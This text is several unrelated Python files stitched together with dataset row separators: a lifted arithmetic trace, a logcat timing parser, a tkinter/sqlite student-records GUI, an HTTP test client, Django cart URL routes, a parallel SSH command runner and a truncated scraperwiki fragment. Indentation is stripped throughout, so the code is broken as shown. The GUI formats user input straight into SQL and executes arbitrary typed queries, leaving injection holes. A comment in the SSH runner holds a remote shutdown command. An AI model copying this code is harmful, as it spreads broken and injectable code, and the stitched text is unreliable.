import sys
def sx(bits, value):
sign_bit = 1 << (bits - 1)
return (value & (sign_bit - 1)) - (value & sign_bit)
SymVar_0 = int(sys.argv[1])
ref_263 = SymVar_0
ref_278 = ref_263 # MOV operation
ref_5710 = ref_278 # MOV operation
ref_5786 = ref_5710 # MOV operation
ref_5800 = (0x1F02C962 | ref_5786) # OR operation
ref_5901 = ref_5800 # MOV operation
ref_5915 = (0x1F8797B2 & ref_5901) # AND operation
ref_6846 = ref_5915 # MOV operation
ref_7764 = ref_6846 # MOV operation
ref_8577 = ref_278 # MOV operation
ref_8653 = ref_8577 # MOV operation
ref_8665 = ref_7764 # MOV operation
ref_8667 = (ref_8665 & ref_8653) # AND operation
ref_9598 = ref_8667 # MOV operation
ref_10431 = ref_278 # MOV operation
ref_10631 = ref_10431 # MOV operation
ref_10637 = (((sx(0x40, 0x66AF1DF) * sx(0x40, ref_10631)) & 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF) & 0xFFFFFFFFFFFFFFFF) # IMUL operation
ref_11673 = ref_9598 # MOV operation
ref_11749 = ref_11673 # MOV operation
ref_11763 = ((ref_11749 << (0x39 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_12802 = ref_9598 # MOV operation
ref_12878 = ref_12802 # MOV operation
ref_12892 = (ref_12878 >> (0x7 & 0x3F)) # SHR operation
ref_12993 = ref_12892 # MOV operation
ref_13005 = ref_11763 # MOV operation
ref_13007 = (ref_13005 | ref_12993) # OR operation
ref_13116 = ref_10637 # MOV operation
ref_13120 = ref_13007 # MOV operation
ref_13122 = ((ref_13120 + ref_13116) & 0xFFFFFFFFFFFFFFFF) # ADD operation
ref_14054 = ref_13122 # MOV operation
ref_22590 = ref_14054 # MOV operation
ref_23808 = ref_14054 # MOV operation
ref_23892 = ref_22590 # MOV operation
ref_23896 = ref_23808 # MOV operation
ref_23898 = ((ref_23896 + ref_23892) & 0xFFFFFFFFFFFFFFFF) # ADD operation
ref_24830 = ref_23898 # MOV operation
ref_26068 = ref_9598 # MOV operation
ref_26144 = ref_26068 # MOV operation
ref_26158 = (0x7 & ref_26144) # AND operation
ref_26259 = ref_26158 # MOV operation
ref_26273 = ((ref_26259 << (0x2 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_27516 = ref_14054 # MOV operation
ref_27592 = ref_27516 # MOV operation
ref_27604 = ref_26273 # MOV operation
ref_27606 = (ref_27604 | ref_27592) # OR operation
ref_28857 = ref_27606 # MOV operation
ref_28859 = ((ref_28857 >> 56) & 0xFF) # Byte reference - MOV operation
ref_28860 = ((ref_28857 >> 48) & 0xFF) # Byte reference - MOV operation
ref_28861 = ((ref_28857 >> 40) & 0xFF) # Byte reference - MOV operation
ref_28862 = ((ref_28857 >> 32) & 0xFF) # Byte reference - MOV operation
ref_28863 = ((ref_28857 >> 24) & 0xFF) # Byte reference - MOV operation
ref_28864 = ((ref_28857 >> 16) & 0xFF) # Byte reference - MOV operation
ref_28865 = ((ref_28857 >> 8) & 0xFF) # Byte reference - MOV operation
ref_28866 = (ref_28857 & 0xFF) # Byte reference - MOV operation
ref_30829 = ref_28859 # MOVZX operation
ref_30905 = (ref_30829 & 0xFF) # MOVZX operation
ref_34489 = ref_28866 # MOVZX operation
ref_34565 = (ref_34489 & 0xFF) # MOVZX operation
ref_34567 = (ref_34565 & 0xFF) # Byte reference - MOV operation
ref_36529 = (ref_30905 & 0xFF) # MOVZX operation
ref_36605 = (ref_36529 & 0xFF) # MOVZX operation
ref_36607 = (ref_36605 & 0xFF) # Byte reference - MOV operation
ref_37835 = ref_9598 # MOV operation
ref_39053 = ((((((((ref_34567) << 8 | ref_28860) << 8 | ref_28861) << 8 | ref_28862) << 8 | ref_28863) << 8 | ref_28864) << 8 | ref_28865) << 8 | ref_36607) # MOV operation
ref_39129 = ref_39053 # MOV operation
ref_39141 = ref_37835 # MOV operation
ref_39143 = (ref_39141 & ref_39129) # AND operation
ref_39244 = ref_39143 # MOV operation
ref_39258 = (0x1F & ref_39244) # AND operation
ref_39359 = ref_39258 # MOV operation
ref_39373 = ((ref_39359 << (0x4 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_40296 = ref_6846 # MOV operation
ref_40372 = ref_40296 # MOV operation
ref_40384 = ref_39373 # MOV operation
ref_40386 = (ref_40384 | ref_40372) # OR operation
ref_41317 = ref_40386 # MOV operation
ref_43860 = ref_24830 # MOV operation
ref_45078 = ref_24830 # MOV operation
ref_45162 = ref_43860 # MOV operation
ref_45166 = ref_45078 # MOV operation
ref_45168 = ((ref_45166 + ref_45162) & 0xFFFFFFFFFFFFFFFF) # ADD operation
ref_46100 = ref_45168 # MOV operation
ref_47338 = ((((((((ref_34567) << 8 | ref_28860) << 8 | ref_28861) << 8 | ref_28862) << 8 | ref_28863) << 8 | ref_28864) << 8 | ref_28865) << 8 | ref_36607) # MOV operation
ref_47414 = ref_47338 # MOV operation
ref_47428 = (0x7 & ref_47414) # AND operation
ref_47529 = ref_47428 # MOV operation
ref_47543 = ((ref_47529 << (0x2 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_48786 = ref_46100 # MOV operation
ref_48862 = ref_48786 # MOV operation
ref_48874 = ref_47543 # MOV operation
ref_48876 = (ref_48874 | ref_48862) # OR operation
ref_50127 = ref_48876 # MOV operation
ref_50129 = ((ref_50127 >> 56) & 0xFF) # Byte reference - MOV operation
ref_50130 = ((ref_50127 >> 48) & 0xFF) # Byte reference - MOV operation
ref_50131 = ((ref_50127 >> 40) & 0xFF) # Byte reference - MOV operation
ref_50132 = ((ref_50127 >> 32) & 0xFF) # Byte reference - MOV operation
ref_50133 = ((ref_50127 >> 24) & 0xFF) # Byte reference - MOV operation
ref_50134 = ((ref_50127 >> 16) & 0xFF) # Byte reference - MOV operation
ref_50135 = ((ref_50127 >> 8) & 0xFF) # Byte reference - MOV operation
ref_50136 = (ref_50127 & 0xFF) # Byte reference - MOV operation
ref_52099 = ref_50129 # MOVZX operation
ref_52175 = (ref_52099 & 0xFF) # MOVZX operation
ref_55759 = ref_50136 # MOVZX operation
ref_55835 = (ref_55759 & 0xFF) # MOVZX operation
ref_55837 = (ref_55835 & 0xFF) # Byte reference - MOV operation
ref_57799 = (ref_52175 & 0xFF) # MOVZX operation
ref_57875 = (ref_57799 & 0xFF) # MOVZX operation
ref_57877 = (ref_57875 & 0xFF) # Byte reference - MOV operation
ref_59105 = ((((((((ref_34567) << 8 | ref_28860) << 8 | ref_28861) << 8 | ref_28862) << 8 | ref_28863) << 8 | ref_28864) << 8 | ref_28865) << 8 | ref_36607) # MOV operation
ref_60323 = ((((((((ref_55837) << 8 | ref_50130) << 8 | ref_50131) << 8 | ref_50132) << 8 | ref_50133) << 8 | ref_50134) << 8 | ref_50135) << 8 | ref_57877) # MOV operation
ref_60399 = ref_60323 # MOV operation
ref_60411 = ref_59105 # MOV operation
ref_60413 = (ref_60411 & ref_60399) # AND operation
ref_60514 = ref_60413 # MOV operation
ref_60528 = (0x1F & ref_60514) # AND operation
ref_60629 = ref_60528 # MOV operation
ref_60643 = ((ref_60629 << (0x4 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_61566 = ref_41317 # MOV operation
ref_61642 = ref_61566 # MOV operation
ref_61654 = ref_60643 # MOV operation
ref_61656 = (ref_61654 | ref_61642) # OR operation
ref_62587 = ref_61656 # MOV operation
ref_65203 = ((((((((ref_55837) << 8 | ref_50130) << 8 | ref_50131) << 8 | ref_50132) << 8 | ref_50133) << 8 | ref_50134) << 8 | ref_50135) << 8 | ref_57877) # MOV operation
ref_66101 = ((((((((ref_34567) << 8 | ref_28860) << 8 | ref_28861) << 8 | ref_28862) << 8 | ref_28863) << 8 | ref_28864) << 8 | ref_28865) << 8 | ref_36607) # MOV operation
ref_66177 = ref_66101 # MOV operation
ref_66189 = ref_65203 # MOV operation
ref_66191 = (ref_66189 | ref_66177) # OR operation
ref_66292 = ref_66191 # MOV operation
ref_66306 = (0xF & ref_66292) # AND operation
ref_66407 = ref_66306 # MOV operation
ref_66421 = (0x1 | ref_66407) # OR operation
ref_66650 = ref_66421 # MOV operation
ref_66652 = ((0x40 - ref_66650) & 0xFFFFFFFFFFFFFFFF) # SUB operation
ref_66660 = ref_66652 # MOV operation
ref_67926 = ref_9598 # MOV operation
ref_68002 = ref_67926 # MOV operation
ref_68016 = (ref_68002 >> (0x1 & 0x3F)) # SHR operation
ref_68117 = ref_68016 # MOV operation
ref_68131 = (0xF & ref_68117) # AND operation
ref_68232 = ref_68131 # MOV operation
ref_68246 = (0x1 | ref_68232) # OR operation
ref_68475 = ref_68246 # MOV operation
ref_68477 = ((0x40 - ref_68475) & 0xFFFFFFFFFFFFFFFF) # SUB operation
ref_68485 = ref_68477 # MOV operation
ref_69403 = ref_62587 # MOV operation
ref_69479 = ref_69403 # MOV operation
ref_69491 = ref_68485 # MOV operation
ref_69493 = ((ref_69479 << ((ref_69491 & 0xFF) & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_70764 = ref_9598 # MOV operation
ref_70840 = ref_70764 # MOV operation
ref_70854 = (ref_70840 >> (0x1 & 0x3F)) # SHR operation
ref_70955 = ref_70854 # MOV operation
ref_70969 = (0xF & ref_70955) # AND operation
ref_71070 = ref_70969 # MOV operation
ref_71084 = (0x1 | ref_71070) # OR operation
ref_72007 = ref_62587 # MOV operation
ref_72083 = ref_72007 # MOV operation
ref_72095 = ref_71084 # MOV operation
ref_72097 = (ref_72083 >> ((ref_72095 & 0xFF) & 0x3F)) # SHR operation
ref_72198 = ref_72097 # MOV operation
ref_72210 = ref_69493 # MOV operation
ref_72212 = (ref_72210 | ref_72198) # OR operation
ref_72313 = ref_72212 # MOV operation
ref_72325 = ref_66660 # MOV operation
ref_72327 = (ref_72313 >> ((ref_72325 & 0xFF) & 0x3F)) # SHR operation
ref_73482 = ((((((((ref_55837) << 8 | ref_50130) << 8 | ref_50131) << 8 | ref_50132) << 8 | ref_50133) << 8 | ref_50134) << 8 | ref_50135) << 8 | ref_57877) # MOV operation
ref_74380 = ((((((((ref_34567) << 8 | ref_28860) << 8 | ref_28861) << 8 | ref_28862) << 8 | ref_28863) << 8 | ref_28864) << 8 | ref_28865) << 8 | ref_36607) # MOV operation
ref_74456 = ref_74380 # MOV operation
ref_74468 = ref_73482 # MOV operation
ref_74470 = (ref_74468 | ref_74456) # OR operation
ref_74571 = ref_74470 # MOV operation
ref_74585 = (0xF & ref_74571) # AND operation
ref_74686 = ref_74585 # MOV operation
ref_74700 = (0x1 | ref_74686) # OR operation
ref_75971 = ref_9598 # MOV operation
ref_76047 = ref_75971 # MOV operation
ref_76061 = (ref_76047 >> (0x1 & 0x3F)) # SHR operation
ref_76162 = ref_76061 # MOV operation
ref_76176 = (0xF & ref_76162) # AND operation
ref_76277 = ref_76176 # MOV operation
ref_76291 = (0x1 | ref_76277) # OR operation
ref_76520 = ref_76291 # MOV operation
ref_76522 = ((0x40 - ref_76520) & 0xFFFFFFFFFFFFFFFF) # SUB operation
ref_76530 = ref_76522 # MOV operation
ref_77448 = ref_62587 # MOV operation
ref_77524 = ref_77448 # MOV operation
ref_77536 = ref_76530 # MOV operation
ref_77538 = ((ref_77524 << ((ref_77536 & 0xFF) & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_78809 = ref_9598 # MOV operation
ref_78885 = ref_78809 # MOV operation
ref_78899 = (ref_78885 >> (0x1 & 0x3F)) # SHR operation
ref_79000 = ref_78899 # MOV operation
ref_79014 = (0xF & ref_79000) # AND operation
ref_79115 = ref_79014 # MOV operation
ref_79129 = (0x1 | ref_79115) # OR operation
ref_80052 = ref_62587 # MOV operation
ref_80128 = ref_80052 # MOV operation
ref_80140 = ref_79129 # MOV operation
ref_80142 = (ref_80128 >> ((ref_80140 & 0xFF) & 0x3F)) # SHR operation
ref_80243 = ref_80142 # MOV operation
ref_80255 = ref_77538 # MOV operation
ref_80257 = (ref_80255 | ref_80243) # OR operation
ref_80358 = ref_80257 # MOV operation
ref_80370 = ref_74700 # MOV operation
ref_80372 = ((ref_80358 << ((ref_80370 & 0xFF) & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_80473 = ref_80372 # MOV operation
ref_80485 = ref_72327 # MOV operation
ref_80487 = (ref_80485 | ref_80473) # OR operation
ref_81342 = ref_80487 # MOV operation
ref_81553 = ref_81342 # MOV operation
ref_81555 = ref_81553 # MOV operation
print ref_81555 & 0xffffffffffffffff
|
5,163 | 585c0f89605f1d791b449f42412174f06d0c5db5 | # -*- coding: utf-8 -*-
# !/usr/bin/python
import re
import sys
import xlwt
import os
'''
python logcat_time.py config_file logcat_file
'''
config_file = sys.argv[1]
logcat_file = sys.argv[2]
turns_time = 0
turn_compelete_flag = 0
def get_filePath_fileName_fileExt(filename):
(filepath, tempfilename) = os.path.split(filename);
(shotname, extension) = os.path.splitext(tempfilename);
return filepath, shotname, extension
#时间字串模板09:52:24.761
def time_str_distance(old_time_str, new_time_str):
rst1 = map(int, re.split(':|\.', old_time_str))
rst2 = map(int, re.split(':|\.', new_time_str))
distance = (rst2[0] * 60 * 60 * 1000 + rst2[1] * 60 * 1000 + rst2[2] * 1000 + rst2[3]) - (
rst1[0] * 60 * 60 * 1000 + rst1[1] * 60 * 1000 + rst1[2] * 1000 + rst1[3])
return distance
def read_tag_pair_config(file_path):
f = open(file_path)
pair_count = 0
pair_list = []
for line in f:
line = line.strip()
config_list = line.split('@')
pair_list.append(config_list)
pair_count = pair_count + 1
return pair_list,pair_count
def caculate_tag_distance(str1, str2):
f = open(logcat_file)
finish_time = ''
start_time = ''
turn_times = 0
for line in f:
turn_compelete_flag = False
if str1 in line:
turn_compelete_flag = False
start_time = line.split()[1]
if str2 in line:
turn_compelete_flag = True
finish_time = line.split()[1]
if turn_compelete_flag:
turn_times = turn_times + 1
str_distance = time_str_distance(start_time, finish_time)
print str_distance
def generate_excel(plist_time_pair,pair_count):
result_sheet = xlwt.Workbook(encoding='utf-8')
sheet = result_sheet.add_sheet('result')
# 生成表头
i = 0
for pair in tag_pair_list:
sheet.write(0, i, pair[0])
i = i + 1
sheet.write(0, i, "总时间")
# 生成数据
j = 1
c = 0
for time_pair in plist_time_pair:
print "----------------------------"
m = 0
#print time_pair, c
for tag_time_pair in time_pair:
time_distance = time_str_distance(tag_time_pair[0], tag_time_pair[1])
sheet.write(j, m, time_distance)
m = m + 1
print "---->",time_distance
start_time_point = time_pair[0][0]
finish_time_point = time_pair[pair_count - 1][1]
all_time = time_str_distance(start_time_point, finish_time_point)
sheet.write(j, m, all_time)
c = c + 1
j = j + 1
(file_p, file_s, file_e) = get_filePath_fileName_fileExt(logcat_file)
result_sheet.save(file_s + '_out.xls')
print ("Finished save output to excel!")
(tag_pair_list,pair_count) = read_tag_pair_config(config_file)
time_stamp = [[0 for _ in range(2)] for _ in range(pair_count)]
f = open(logcat_file)
list_time_pair = []
for line in f:
i = 0
if line == '\n':
continue
for pair in tag_pair_list:
if pair[1].strip() in line:
time_stamp[i][0] = line.split()[1]
if pair[2].strip() in line:
time_stamp[i][1] = line.split()[1]
if i == pair_count - 1:
compeled_flag = False
for tm_st in time_stamp:
if tm_st[0] == 0 or tm_st[1] == 0:
compeled_flag = False
break
else:
compeled_flag = True
if compeled_flag:
list_time_pair.append(time_stamp)
all_time = time_str_distance(time_stamp[0][0], time_stamp[pair_count - 1][1])
#print "all time:", all_time
time_stamp = [[0 for _ in range(2)] for _ in range(pair_count)] # 二位数组置空
i = i + 1
print '=================='
generate_excel(list_time_pair,pair_count) |
5,164 | 4c6b04716f41c3413896f0d59f2cc9b1475d7f64 | from tkinter import*
from tkinter import filedialog
import sqlite3
class Gui:
def __init__(self):
global en3
self.scr = Tk()
self.scr.geometry("2000x3000")
self.scr.title("VIEWING DATABASE")
self.connection = sqlite3.connect("student_details.db")
self.cursor = self.connection.cursor()
self.id = StringVar()
self.name1 = StringVar()
self.fathername = StringVar()
self.mothername = StringVar()
self.cont = StringVar()
self.email = StringVar()
self.f1 = Frame(self.scr, bg='brown1')
self.f1.pack(side=TOP)
self.left_frame = Frame(self.scr, bg='red')
self.left_frame.pack(side=LEFT, fill=Y)
self.right_frame = Frame(self.scr, width=3000, bg='yellow')
self.right_frame.pack(side=LEFT, fill=Y)
l = Label(self.right_frame, text="***************SHOW TABLE RECORDS IN A DATABASE******************",
font=('times', 25, 'bold'), bg="black", fg="white")
l.pack(side=TOP, fill=X)
scrollbar = Scrollbar(self.right_frame)
scrollbar.pack(side=RIGHT, fill=Y)
self.list = Listbox(self.right_frame, width=61, height=12, font=('times', 25, 'bold'),
yscrollcommand=scrollbar.set)
self.list.bind("student_list", self.show_records)
self.list.pack(side=TOP, fill=Y)
scrollbar.config(command=self.list.yview)
self.querry_frame = Frame(self.right_frame, width=81, height=5, bg="white")
self.querry_frame.pack(side=BOTTOM, fill=X)
self.en3 = Entry(self.querry_frame, font=('times', 25, 'bold'))
self.en3.pack(side=BOTTOM, fill=X)
b = Button(self.querry_frame, text="Enter",command=self.sample, font=('times', 25, 'bold'), bg="white", fg="black")
b.pack(side=RIGHT)
b1 = Button(self.querry_frame, text="Save", command=self.show_data, font=('times', 25, 'bold'), bg="white",
fg="black")
b1.pack(side=RIGHT)
b = Button(self.f1, text="OPEN", command=self.file, font=('times', 25, 'bold'), bg="white", fg="black")
b.pack(side=LEFT)
b = Button(self.f1, text="CREATE", command=self.create_table, font=('times', 25, 'bold'), bg="white",
fg="black")
b.pack(side=LEFT)
b1 = Button(self.f1, text="INSERT", command=self.add_record, font=('times', 25, 'bold'), bg="white",
fg="black")
b1.pack(side=LEFT)
b2 = Button(self.f1, text="DELETE", command=self.del_rec, font=('times', 25, 'bold'), bg="white",
fg="black")
b2.pack(side=LEFT)
b3 = Button(self.f1, text="UPDATE", command=self.update, font=('times', 25, 'bold'), bg="white",
fg="black")
b3.pack(side=RIGHT)
b4 = Button(self.f1, text="VIEW", command=lambda: self.view_table(), font=('times', 25, 'bold'), bg="white",
fg="black")
b4.pack(side=RIGHT)
b4 = Button(self.f1, text="BROWSE", command=self.show_data, font=('times', 25, 'bold'), bg="white",
fg="black")
b4.pack(side=RIGHT)
l = Label(self.left_frame, text="View Table in Database", font=('times', 25, 'bold'), bg='blue', fg='white')
l.pack(side=TOP, fill=X)
self.scr.mainloop()
try:
self.cursor.execute("create table user(Id varchar(10),Name varchar(30),FathersName varchar(20),MothersName varchar(20),Contact varchar(10),Email varchar(30))")
self.connection.commit()
except:
pass
def insert_data(self):
self.id = e.get()
self.name1 = e1.get()
self.fathername=e2.get()
self.mothername = e3.get()
self.cont = e4.get()
self.email = e5.get()
self.cursor.execute("insert into user values('{}','{}','{}','{}','{}','{}')".format(self.id,self.name1, self.fathername,self.mothername,self.cont , self.email))
self.connection.commit()
def show_data(self):
self.connection = sqlite3.connect("student_details.db")
self.cursor = self.connection.cursor()
self.cursor.execute("Select * from user")
rows = self.cursor.fetchall()
for row in rows:
l1 = self.list.insert(END, row)
self.connection.commit()
def update_data(self):
self.cursor.execute("Update user set {} = '{}' where id ='{}'".format(e2.get(),e3.get(),e.get()))
self.connection.commit()
self.list.delete(0, END)
self.show_data()
def update(self):
global e
global e2
global e3
self.top1 = Toplevel(self.scr)
self.top1.geometry("400x400")
l1 = Label(self.top1, text="USER_ID", font=('times', 25, 'bold'), bg="green2", fg="white")
l1.pack()
self.Id=StringVar()
e = Entry(self.top1, relief="sunken", textvariable=self.Id, font=('times', 25, 'bold'))
e.pack()
self.col_name=StringVar()
l2 = Label(self.top1, text="col_name", font=('times', 25, 'bold'), bg="green2", fg="white")
l2.pack()
e2 = Entry(self.top1, relief="sunken", textvariable=self.col_name, font=('times', 25, 'bold'))
e2.pack()
self.value=StringVar()
l3 = Label(self.top1, text="VALUE", font=('times', 25, 'bold'), bg="green2", fg="white")
l3.pack()
e3 = Entry(self.top1, relief="sunken", textvariable=self.value, font=('times', 25, 'bold'))
e3.pack()
b = Button(self.top1, text="UPDATE", command=self.update_data, font=('times', 25, 'bold'), bg="white",
fg="black")
b.pack()
self.top1.mainloop()
def delete_data(self):
self.cursor.execute("Delete from user where id ='{}'".format(e.get()))
self.list.delete(0,END)
self.connection.commit()
self.show_data()
def del_rec(self):
global e
self.top2 = Toplevel(self.scr)
self.top2.geometry("400x400")
l1 = Label(self.top2, text="USER_ID", font=('times', 25, 'bold'), bg="green2", fg="white")
l1.pack()
self.Id = StringVar()
e = Entry(self.top2, relief="sunken", textvariable=self.Id, font=('times', 25, 'bold'))
e.pack()
b = Button(self.top2, text="delete records", command=self.delete_data, font=('times', 25, 'bold'), bg="white",
fg="black")
b.pack()
self.top2.mainloop()
def sample(self):
s=('{}'.format(self.en3.get()))
a=self.cursor.execute("{}".format(self.en3.get()))
r=self.cursor.fetchall()
for row in r:
self.list.insert(0,row)
self.connection.commit()
def file(self):
self.f1.filename = filedialog.askopenfilename( title="Select file")
p=self.f1.filename
self.list.insert(0,self.f1.filename)
def add_record(self):
global e
global e1
global e2
global e3
global e4
global e5
self.e = StringVar()
self.e1 = StringVar()
self.e2 = StringVar()
self.e3 = StringVar()
self.e4 = StringVar()
self.e5 = StringVar()
self.top=Toplevel(self.scr)
self.top.geometry("400x800")
l=Label(self.top,text="USER_ID",font=('times',25,'bold'),bg="green2",fg="white")
l.pack()
e=Entry(self.top,relief="sunken",textvariable=self.e,font=('times',25,'bold'))
e.pack()
l1 = Label(self.top, text="USERNAME", font=('times', 25, 'bold'), bg="green2", fg="white")
l1.pack()
e1 = Entry(self.top, relief="sunken",textvariable=self.e1, font=('times', 25, 'bold'))
e1.pack()
l2 = Label(self.top, text="FATHERS NAME", font=('times', 25, 'bold'), bg="green2", fg="white")
l2.pack()
e2 = Entry(self.top, relief="sunken",textvariable=self.e2, font=('times', 25, 'bold'))
e2.pack()
l3 = Label(self.top, text="MOTHERS NAME", font=('times', 25, 'bold'), bg="green2", fg="white")
l3.pack()
e3 = Entry(self.top, relief="sunken",textvariable=self.e3, font=('times', 25, 'bold'))
e3.pack()
l4 = Label(self.top, text="CONTACT NO", font=('times', 25, 'bold'), bg="green2", fg="white")
l4.pack()
e4 = Entry(self.top, relief="sunken",textvariable=self.e4, font=('times', 25, 'bold'))
e4.pack()
l5 = Label(self.top, text="E-MAIL ID", font=('times', 25, 'bold'), bg="green2", fg="white")
l5.pack()
e5 = Entry(self.top, relief="sunken",textvariable=self.e5, font=('times', 25, 'bold'))
e5.pack()
varchk=IntVar()
b = Button(self.top, text="SUBMIT", command=self.insert_data,font=('times', 25, 'bold'), bg="white",fg="black")
b.pack()
self.top.mainloop()
def view_table(self):
global list_box
self.list_box = Listbox(self.left_frame, font=('times', 20, 'bold'))
try:
self.list_box.insert(1,"user")
self.list_box.insert(2,self.tbl_name)
except:
pass
b=Button(self.left_frame,text="Click",font=('times', 20, 'bold'),command=self.selection,bg="white",fg="black")
b.place(x=100,y=400)
self.list_box.place(x=10,y=50)
def selection(self):
lb = self.list_box.curselection()
print(lb)
for i in list(lb):
self.show_data()
def show_records(self):
global m
m=self.list.curselection()
m=self.list.get(m)
self.id.delete(0,END)
self.id.insert(END,self.add_record())
global table_name
def create_table(self):
self.top = Toplevel(self.scr)
self.top.geometry("400x800")
self.table_name=StringVar()
l=Label(self.top,text="Table",font=('times', 20, 'bold'),bg="white",fg="black")
l.pack()
e=Entry(self.top,textvariable=self.table_name,font=('times', 20, 'bold'))
e.pack()
b=Button(self.top,text="Add field",command=self.fun_show , font=('times', 20, 'bold'),bg="white",fg="black")
b.pack()
b=Button(self.top,text="OK",font=('times', 20, 'bold'),command=self.show_entered_data,bg="white",fg="black")
b.pack(side=RIGHT)
def show_entered_data(self):
global en1
global en2
global list1
global tbl_name
self.tbl_name=self.table_name.get()
self.en1=self.entry1.get()
self.en2=self.entry2.get()
sent="Create table "+str(self.tbl_name)+"('"+str(self.en1)+ " "+ str(self.en2)+"')"
list1 = Text(self.top, width=41, height=8, font=('times', 25, 'bold'))
list1.place(x=0,y=0)
list1.insert(0.0,sent)
print(self.tbl_name,self.en1,self.en2)
self.cursor.execute(sent)
self.list.insert(0,sent)
self.connection.commit()
def fun_show(self):
l = Label(self.top, text="Name", font=('times', 20, 'bold'), bg="white", fg="black")
l.pack(side=TOP)
self.entry1 = StringVar()
e1 = Entry(self.top, textvariable=self.entry1, font=('times', 20, 'bold'))
e1.pack()
l = Label(self.top, text="type", font=('times', 20, 'bold'), bg="white", fg="black")
l.pack(side=TOP)
self.entry2 = StringVar()
e1 = Entry(self.top, textvariable=self.entry2, font=('times', 20, 'bold'))
e1.pack()
Gui() |
5,165 | cd9b04a93d85ba0ee2a38b534386f9aec0ef6895 | import httplib
import sys
http_server = "localhost:8000"
connection = httplib.HTTPConnection(http_server)
# Open test input.
test_file_path = "test_input"
test_f = open(test_file_path)
inputs = test_f.readlines()
inputs = [x.strip() for x in inputs]
test_f.close()
# Open expected input.
expected_file_path = "expected"
expected_f = open(expected_file_path)
expecteds = expected_f.readlines()
expecteds = [x.strip() for x in expecteds]
expected_f.close()
assert(len(inputs) == len(expecteds))
for i in range(len(inputs)):
connection.request("GET", ("<start>%s<end>" % inputs[i]))
response = connection.getresponse()
if response.status != 200:
print("Request failed for input: %s. Reason: %s" % (inputs[i], response.reason))
output = response.read()
print("Output:", output)
print("Expected:", expecteds[i])
if expecteds[i] == output:
print("SUCCESS")
else:
print("FAILURE")
|
5,166 | 5b3a6b44bd9ea80da1983d8254c73bba3e2338e1 | from django.conf.urls import url
from cart import views
urlpatterns=[
url(r'^add/$',views.cart_add,name='add'),#t添加购物车数据
url(r'^count/$',views.cart_count,name='count'),#huo获取购物车商品数量
url(r'^del/$',views.cart_del,name='delete'),#删除购物车商品记录
url(r'update/$',views.cart_update,name='update'),#更新购物车商品数目
url(r'^&',views.cart_show,name='show'),#显示用户购物车页面
]
|
5,167 | 874fa2a6afdd04f3f2232a86f56d220447160ede | # cases where DictAchievement should unlock
# >> CASE
{'name': 'John Doe', 'age': 24}
# >> CASE
{
'name': 'John Doe',
'age': 24
}
# >> CASE
func({'name': 'John Doe', 'age': 24})
|
5,168 | ace7e5676fcb01c3542952eaacdada9963b8467a | import sgc
import multiprocessing as mp
# import json
import argparse
import os
import re
#Process argument passed to the script
parser = argparse.ArgumentParser(description='Execute commands parallel on remote servers')
parser.add_argument('-f', action='store', required=True, dest='file', help='servers list')
group = parser.add_mutually_exclusive_group()
group.add_argument('-c', action='store', dest='commands', help='commands need to execute')
group.add_argument('-S', action='store', dest='script', help='local script which need to execute on remote servers')
options = parser.parse_args()
#Exit if input file is zero
if os.path.getsize(options.file) == 0:
print("Error: server list file is empty")
exit(2)
#Process the input file and store the server in list variable servers
file = open(options.file, 'r')
servers = []
for line in file:
line = line.strip('\n')
if len(line) == 0 or line in servers:
continue
servers.append(line)
#Exit the script if the servers list is empty
if not servers:
print("Error: server list file is empty")
exit(2)
#Process the commands passed into the script
commands = []
if options.commands and re.match(r'[a-zA-Z0-9]', options.commands):
for item in options.commands.split(','):
item = item.replace('"', '')
commands.append(item)
#Exit the script if command list is empty
if not commands:
print("Error: command list is empty")
parser.print_help()
exit(2)
if options.script:
commands = ['/tmp/'+os.path.basename(options.script)]
#servers = ['localhost', 'centos6web', 'fedora.kannan.lab', '127.0.0.1', '127.0.0.2', '127.0.0.3', '127.0.0.4',
# '127.0.0.100', '127.0.0.200', '127.0.0.150', '127.0.0.10', '127.0.0.20', '127.0.0.30']
# servers = ['centos6web', 'fedora.kannan.lab']
# commands = ('sudo shutdown -h 0',)
# commands = ('uptime', 'uname -a', 'sudo fdisk -l')
queue = mp.Queue()
def worker(server, commands):
# print(mp.current_process().name)
output = {}
output['server'] = server
session = sgc.Ssh(server=server)
# print("Connected to server {}".format(server))
# else:
# print("Unable to connect to server {}\n{}".format(server, session.connection_error))
if session.ping == 'Alive':
session.connect()
# print(session.connection)
if session.connection == False:
output['commands'] = session.connection_error
else:
if options.script:
if not os.path.exists(options.script):
output['commands'] = "Error: the script location {} not exists".format(options.script)
print("Error: the script location {} not exists".format(options.script))
else:
curdir = os.getcwd()
folder, file = os.path.split(options.script)
if not folder:
folder = curdir
try:
os.chdir(folder)
sftp = session.Sftp()
sftp.chdir('/tmp')
sftp.put(file, file)
commands = ('/tmp/'+file,)
session.execute(('/bin/chmod a+x /tmp/'+file, ))
except Exception as error:
output['commands'] = error
output['commands'] = session.execute(commands)
else:
output['commands'] = 'Down'
queue.put(output)
# if output != None:
# print("Server {}".format(server))
# for key in output:
# print(key, output[key])
# pool = mp.Pool(processes=mp.cpu_count())
# result = pool.map_async(worker, servers)
# for item in result.get():
# print(json.dumps(item, indent=4))
procs = []
limits = mp.cpu_count()
while servers:
if len(mp.active_children()) < limits:
server = servers.pop()
proc = mp.Process(target=worker, args=(server, commands), name=server)
procs.append(proc)
proc.start()
while mp.active_children() :
if not queue.empty():
item = queue.get()
if item['commands'] == 'Down':
print("Server: {} : Unable to ping".format(item['server']))
continue
if type(item['commands']) != type(dict()):
print("Server: {} : {}".format(item['server'], item['commands']))
continue
print("Server: {}".format(item['server']))
for command in commands:
if item['commands'][command][0] != "":
if options.script:
print("Output of Command: {}".format(options.script))
else:
print("Output of Command: {}".format(command))
print(item['commands'][command][0])
if item['commands'][command][1] != "":
print("Error occurred on command: {}".format(command))
print(item['commands'][command][1])
print("**************************************************************************")
|
5,169 | 86ec33393bb19ee432c30834ea7983b11f4d1234 | import scraperwiki
import xlrd
xlbin = scraperwiki.scrape("http://www.whatdotheyknow.com/request/82804/response/208592/attach/2/ACCIDENTS%20TRAMS%20Laurderdale.xls")
